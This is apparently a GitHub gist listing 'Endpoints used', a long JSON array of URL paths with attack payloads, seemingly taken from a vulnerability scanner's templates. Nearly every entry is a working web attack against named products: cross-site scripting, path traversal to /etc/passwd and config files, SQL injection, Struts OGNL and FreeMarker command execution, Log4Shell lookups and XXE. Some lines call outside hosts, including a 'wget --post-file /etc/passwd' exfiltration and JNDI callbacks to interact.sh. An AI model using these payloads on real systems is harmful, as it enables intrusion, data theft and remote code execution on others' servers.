@GuanacoDevs
Created June 28, 2022 15:09
Endpoints used
[
"/ui/vropspluginui/rest/services/getstatus",
"/ghost/preview",
"/wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/?page=cnss_social_icon_page",
"/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq';%7D%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/log_download.cgi?type=../../etc/passwd",
"/templates/m/inc_head.php?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00",
"/plugins/servlet/oauth/users/icon-uri?consumerUri=http://cadgqm02toabu64p21o0ckqa5eoyfhsgh.interact.sh",
"/include/downmix.inc.php",
"/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd",
"/actuator/gateway/routes/2A6ShqePdZpZ1dNu0uBhuYpknGL",
"/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00",
"/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd",
"/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/language/lang",
"/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&contactId=contactId'%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&",
"/assets/elFinder-2.1.9/elfinder.html",
"/2A6ShuByWPXRtqTVriIL2i8s3xT",
"/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=%5B33:system('wget%20http://example.com')%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json",
"/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs",
"/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/files.md5",
"/?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22",
"/clansphere/mods/clansphere/lang_modvalidate.php?language=language'%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&module=module",
"/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml",
"/wp-admin/admin.php?page=domain-check-profile&domain=test.foo%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/cs/ContentServer",
"/",
"/xmlpserver/convert?xml=%3C%3Fxml+version%3D%221.0%22+%3F%3E%3C!DOCTYPE+r+%5B%3C!ELEMENT+r+ANY+%3E%3C!ENTITY+%25+sp+SYSTEM+%22http%3A//cadgqm02toabu64p21o0ckx1g7ayemg3r.interact.sh/xxe.xml%22%3E%25sp%3B%25param1%3B%5D%3E&_xf=Excel&_xl=123&template=123",
"/wp-content/plugins/jh-404-logger/readme.txt",
"/solr/admin/cores?wt=json",
"/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd",
"/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?name=%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D'cat%20/etc/passwd').(%23iswin%3D(%40java.lang.System%40getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3D(%23iswin%3F%7B'cmd.exe'%2C'/c'%2C%23cmd%7D%3A%7B'/bin/bash'%2C'-c'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D",
"/integration/saveGangster.action",
"/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew()(%22cat%20%2Fetc%2Fhosts%22)%7D",
"/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&",
"/lua/.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2Ffind_prefs.lua.css",
"/IntellectMain.jsp?IntellectSystem=https://www.example.com",
"/wp-admin/admin-ajax.php?action=cace3497d458872ea7495749f83d7b1f",
"/_fragment?_path=_controller=phpcredits&flag=-1",
"/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E",
"/druid/indexer/v1/sampler",
"/mailingupgrade.php",
"/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Eyql8b=1",
"/?layout=/etc/passwd",
"/tag_test_action.php?url=a&token=&partcode=%7Bdede:field%20name='source'%20runphp='yes'%7Dphpinfo();%7B/dede:field%7D",
"/index.php?redirect=//evil.com",
"/Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(document.domain)%22%3E%3Cform%3E",
"/?q=%7B%7Buserid%7D%7D%2Fcancel",
"/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E",
"/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C",
"/wp-login.php?wlcms-action=preview",
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00",
"/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00",
"/api/experimental/latest_runs",
"/admin/",
"/secureader/javax.faces.resource/web.xml?loc=../WEB-INF",
"/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd",
"/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd",
"/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/Admin",
"/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php",
"/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00",
"/cgi/networkDiag.cgi",
"/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php",
"/filemanager/upload.php",
"/wp-admin/options-general.php?page=yuzo-related-post",
"/theme/META-INF/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd",
"/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../",
"/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc",
"/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json",
"/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini",
"/+CSCOE+/saml/sp/acs?tgname=a",
"/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php/backend_api/ajax_get_calendar_events",
"/reports/rwservlet/showenv",
"/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22",
"/api/jolokia/read%3Csvg%20onload=alert(document.domain)%3E?mimeType=text/html",
"/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test",
"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd",
"/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+",
"/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/wp-admin/admin.php",
"/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%3C%22",
"/s/2A6ShwgIWT5ykzQjyonkb6LbI6d/_/;/WEB-INF/web.xml",
"/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat%20/etc/passwd').getInputStream()))",
"/rest/api/2/user/picker?query=",
"/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4",
"/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/2A6ShzJNEsB5lfQskwfzfC2RVMG/)%3C%2Fscript%3E",
"/druid/indexer/v1/sampler?for=connect",
"/index.php/example.com",
"/mantisbt-2.3.0/verify.php?id=1&confirm_hash=",
"/wp-json/buddypress/v1/signup",
"/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60",
"/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00",
"/openam/oauth2/..;/ccversion/Version",
"/wp-admin/admin.php?page=rsvp-admin-export",
"/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa",
"/theme/META-INF/prototype%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AFwindows/win.ini",
"/lib/dompdf/dompdf.php?input_file=dompdf.php",
"/index.action?action:$%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'sh','-c','id'%7D)).start(),%23b%3D%23a.getInputStream(),%23c%3Dnew%20java.io.InputStreamReader(%23b),%23d%3Dnew%20java.io.BufferedReader(%23c),%23e%3Dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"/omni_success?cmdb_edit_path=%22);alert('nuclei');//",
"/api/getServices?name%5B%5D=$(wget%20--post-file%20/etc/passwd%20%7B%7Binteractsh-url%7D%7D)",
"/session/%7B%7Bsessionid%7D%7D/node/index",
"/ws_utc/resources/setting/options",
"/?x=$%7Bjndi:ldap://$%7BhostName%7D.uri.cadgqm02toabu64p21o0ckqjuseyni1fn.interact.sh/a%7D",
"/.%00./.%00./etc/passwd",
"/global-protect/login.esp?user=j%22;-alert(1)-%22x",
"/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bcat%20%2Fetc%2Fpasswd%20%23",
"/pme/media/",
"/api/snapshots/:key",
"/wp-content/plugins/insert-php/readme.txt",
"/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E",
"/plugins/servlet/svnwebclient/commitGraph.jsp?')%3Balert(%22XSS",
"/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00",
"/ads/www/delivery/lg.php?dest=http://example.com",
"/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk",
"/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00",
"/tests/support/stores/test_grid_filter.php?query=phpinfo();",
"/pages/createpage-entervariables.action?SpaceKey=x",
"/apisix/admin/migrate/export",
"/authenticationendpoint/%7B%7Bto_lower(%222A6Shsd2UVbt3M3Q9XHhMv59lUY%22)%7D%7D.jsp",
"/flightpath/index.php?q=system-handle-form-submit",
"/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd",
"/webmail/calendar/minimizer/index.php?style=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/etc%5Cpasswd",
"/wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd",
"/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image",
"/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd",
"/blast/nph-viewgif.cgi?../../../../etc/passwd",
"/autodiscover/autodiscover.json",
"/prweb/PRAuth/app/default/",
"/ajaxPages/writeBrowseFilePathAjax.php",
"/_snapshot/test2",
"/scripts/setup.php",
"/adminer?elastic=example.com&username=",
"/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true",
"/dashboardUser",
"/wp-admin/index.php",
"/tmui/locallb/workspace/fileSave.jsp",
"/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00",
"/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00",
"/zb_system/cmd.php?atc=login&redirect=http://www.example.com",
"/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00",
"/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00",
"/InsightPluginShowGeneralConfiguration.jspa;",
"/menu/stc",
"/lucee/admin/imgProcess.cfm?file=/whatever",
"/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00",
"/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B",
"/index.php?class=../../../../../../../etc/passwd%00",
"/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00",
"/menu/stapp",
"/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample",
"/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search",
"/2A6ShrtNQ3CY2h6jmVQN9akWRWy.php%5Cx0A",
"/assets/elFinder/elfinder.html",
"/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd",
"/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://cadgqm02toabu64p21o0ckxb88eygadt1.interact.sh%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://cadgqm02toabu64p21o0ckxb88eygadt1.interact.sh%7D;?%7B%7Brepeat(%22A%22,",
"/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true",
"/manage/webshell/u?s=5&w=218&h=15&k=%0A&l=62&_=5621298674064",
"/api/experimental/dags/example_trigger_target_dag/dag_runs",
"/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)",
"/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00",
"/CTCWebService/CTCWebServiceBean/ConfigServlet",
"/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00",
"/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/jolokia/read/getDiagnosticOptions",
"/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Fultimatebingoverifier.appspot.com%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user')%3Balert(document.domain)%3B//&ses=test_user&t=1",
"/mgmt/tm/util/bash",
"/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/RestAPI/ImportTechnicians",
"/setup.php",
"/testrail/files.md5",
"/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00",
"/nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml",
"/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots",
"/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/www.example.com",
"/getcfg.php",
"/system/deviceInfo?auth=YWRtaW46MTEK",
"/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd",
"/dumpmdm.cmd",
"/wsman",
"/admin/elfinder/elfinder-cke.html",
"/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=%3Cgroup_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/share/page/dologin",
"/_search?pretty",
"/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user%5Bemail%5D=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym",
"/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00",
"/login.action?action:$%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'sh','-c','id'%7D)).start(),%23b%3D%23a.getInputStream(),%23c%3Dnew%20java.io.InputStreamReader(%23b),%23d%3Dnew%20java.io.BufferedReader(%23c),%23e%3Dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin",
"/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00",
"/auth/requestreset",
"/system/console?.css",
"/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00",
"/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('cat%20/etc/passwd')%2B'",
"/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-",
"/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00",
"/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert(document.domain)%3C%2FsCripT%3E",
"/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine",
"/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt",
"/debug/pprof/goroutine?debug=1",
"/?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert(document.domain)%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng",
"/index.php?page=&action=edit&f1=.//./%5C.//./%5C.//./%5C.//./%5C.//./%5C.//./etc/passwd&restore=1",
"/mifs/.;/services/LogService",
"/wp-admin/",
"/search/members/?id%60%3D520)%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex('70726f6a656374646973636f766572792e696f')%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1",
"/webadmin/out",
"/wp-admin/admin.php?page=fv_player_stats&player_id=1%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
"/menu/ss?sid=nsroot&username=nsroot&force_setup=1",
"/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)",
"/dokuwiki/doku.php?id=wiki:welcome&at=%3Csvg%20onload=alert(document.domain)%3E",
"/about_state",
"/uploads/employees_ids/%7B%7Bendpoint%7D%7D?cmd=cat%20/etc/passwd",
"/storfs-asup",
"/comm.php?id=../../../../../../../../../../etc/passwd",
"/backend/admin/common/clearcache?previousUrl=http://www.example.com",
"/pages/createpage.action?spaceKey=myproj",
"/does_not_exist%22%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cimg%20src=x",
"/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd",
"/v1/2A6ShuWmQx8uPyLas0WP65eEzCb.php",
"/cgi-bin/config.exp",
"/labkey/__r1/login-login.view?returnUrl=http://example.com",
"/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(document.domain)')()%7D%7D?orgId=1",
"/%5Cgoogle.com/evil.html",
"/carbon/admin/login.jsp?msgId='%3Balert('nuclei')%2F%2F",
"/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_canteen&controller=../../../../../etc/passwd%00",
"/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd",
"/help/admin-guide/test.jsp",
"/console/images/%252e%252e%252fconsole.portal",
"/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(document.domain)%3E",
"/horde/admin/user.php",
"/wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login=%7B%7Busername%7D%7D",
"/t/index.php?action%5B%5D=aaaa",
"/api/v4/ci/lint?include_merged_yaml=true",
"/index.action?redirectAction:$%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'sh','-c','id'%7D)).start(),%23b%3D%23a.getInputStream(),%23c%3Dnew%20java.io.InputStreamReader(%23b),%23d%3Dnew%20java.io.BufferedReader(%23c),%23e%3Dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2BCSCOE%2B/portal_inc.lua",
"/image/image%3A%2F%2F..%252fetc%252fpasswd",
"/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cadgqm02toabu64p21o0ckojtbeym45ty.interact.sh%23",
"/users/user-dark-features",
"/cgi-bin/file_transfer.cgi",
"/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename'%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&",
"/wp-content/plugins/canto/includes/lib/tree.php?subdomain=cadgqm02toabu64p21o0ckp95fyybtibw.interact.sh",
"/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ew5px3=1",
"/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00",
"/wp-admin/admin.php?page=cf7skins&tab='%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E",
"/debug.cgi",
"/backup2.cgi",
"/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00",
"/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00",
"/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E",
"/service/extdirect",
"/api/settings/values",
"/api/2A6Si1iuZkUvcvEZnW40RolsmKU",
"/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php/catalogsearch/advanced/result/?name=e",
"/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd",
"/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/RPC2_Login",
"/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
